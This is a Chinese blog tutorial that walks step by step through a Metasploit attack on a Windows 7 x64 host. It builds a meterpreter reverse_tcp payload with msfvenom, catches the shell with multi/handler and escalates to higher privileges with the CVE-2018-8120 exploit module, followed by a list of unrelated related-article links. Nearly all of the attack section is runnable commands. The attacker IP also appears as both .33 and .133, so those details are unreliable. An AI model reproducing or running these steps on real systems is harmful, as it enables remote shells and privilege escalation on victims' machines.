Metasploit -- 利用cve-2018-8120提升权限

简介: Metasploit -- 利用cve-2018-8120提升权限

一、生成木马


目标主机:192.168.1.129(win7 x64)


攻击机:192.168.1.33


攻击端口:12121


生成木马:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe


0a2653c851af460fa595bd959398a8f1.png


二、进入监听模块          use exploit/multi/handler


三、设置payload反弹    set windows/x64/meterpreter/reverse_tcp


0eacb84100b54626af849e6b562bf92a.png


四、查看需要设置的参数:show options


2d65d23f6d4748949b924e4057485923.png


五、设置攻击机ip:set lhost 192.168.1.133


六、设置攻击端口:set lport 12121


2e9b90b2ca334476abebe75bafe6eeaa.png


七、将生成的exe文件上传到目标主机并运行


八、run攻击


0a2653c851af460fa595bd959398a8f1.png


九、getuid  查看权限


十、background  后台运行


0eacb84100b54626af849e6b562bf92a.png


十一、搜索我们要利用的模块  search cve-2018-8120,并选择进入


2d65d23f6d4748949b924e4057485923.png


十二、run,运行,并重新查看权限


2e9b90b2ca334476abebe75bafe6eeaa.png


禁止非法,后果自负


目录
相关文章
|
Ubuntu 数据安全/隐私保护 芯片
M1/M2芯片Parallels Desktop虚拟机安装Ubuntu系统
M1/M2芯片Parallels Desktop虚拟机安装Ubuntu系统
1053 0
M1/M2芯片Parallels Desktop虚拟机安装Ubuntu系统
|
网络安全 数据安全/隐私保护 Python
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
285 0
|
前端开发 C++ iOS开发
几款主流好用的markdown编辑器介绍
几款主流好用的markdown编辑器介绍
825 1
|
SQL 安全 PHP
CTF--Web安全--SQL注入之Post-Union注入
CTF--Web安全--SQL注入之Post-Union注入
|
存储 算法 安全
程序员必知:分布式一致性Raft与JRaft
程序员必知:分布式一致性Raft与JRaft
247 0
|
安全 测试技术 API
实战基于terraform-compliance实现IaC安全
随着云计算的普及和企业对基础设施即代码(IaC)的采用增加,确保云基础设施的安全和合规性变得至关重要。Azure作为领先的云服务提供商之一,为企业提供了强大的基础设施和服务,而Terraform作为流行的IaC工具,则为云资源的自动化部署和管理提供了有效的解决方案。 然而,单纯依赖Terraform配置并不足以保证部署的安全性和符合性。因此,利用符合性测试工具对IaC代码进行全面的安全审计和合规性检查显得尤为重要。
|
缓存 负载均衡 Linux
获取真实 IP 地址(一):判断是否使用 CDN(附链接)
获取真实 IP 地址(一):判断是否使用 CDN(附链接)
|
关系型数据库 MySQL 数据库
【报错】DVWA遇到Could not connect to the database service. Please check the config file. Database Error
【报错】DVWA遇到Could not connect to the database service. Please check the config file. Database Error
2140 0
|
缓存 移动开发 JavaScript
如何将 JavaScript 代码添加到网页中,以及 <script> 标签的属性
如何将 JavaScript 代码添加到网页中,以及 <script> 标签的属性
569 0
如何将 JavaScript 代码添加到网页中,以及 <script> 标签的属性
下一篇
oss教程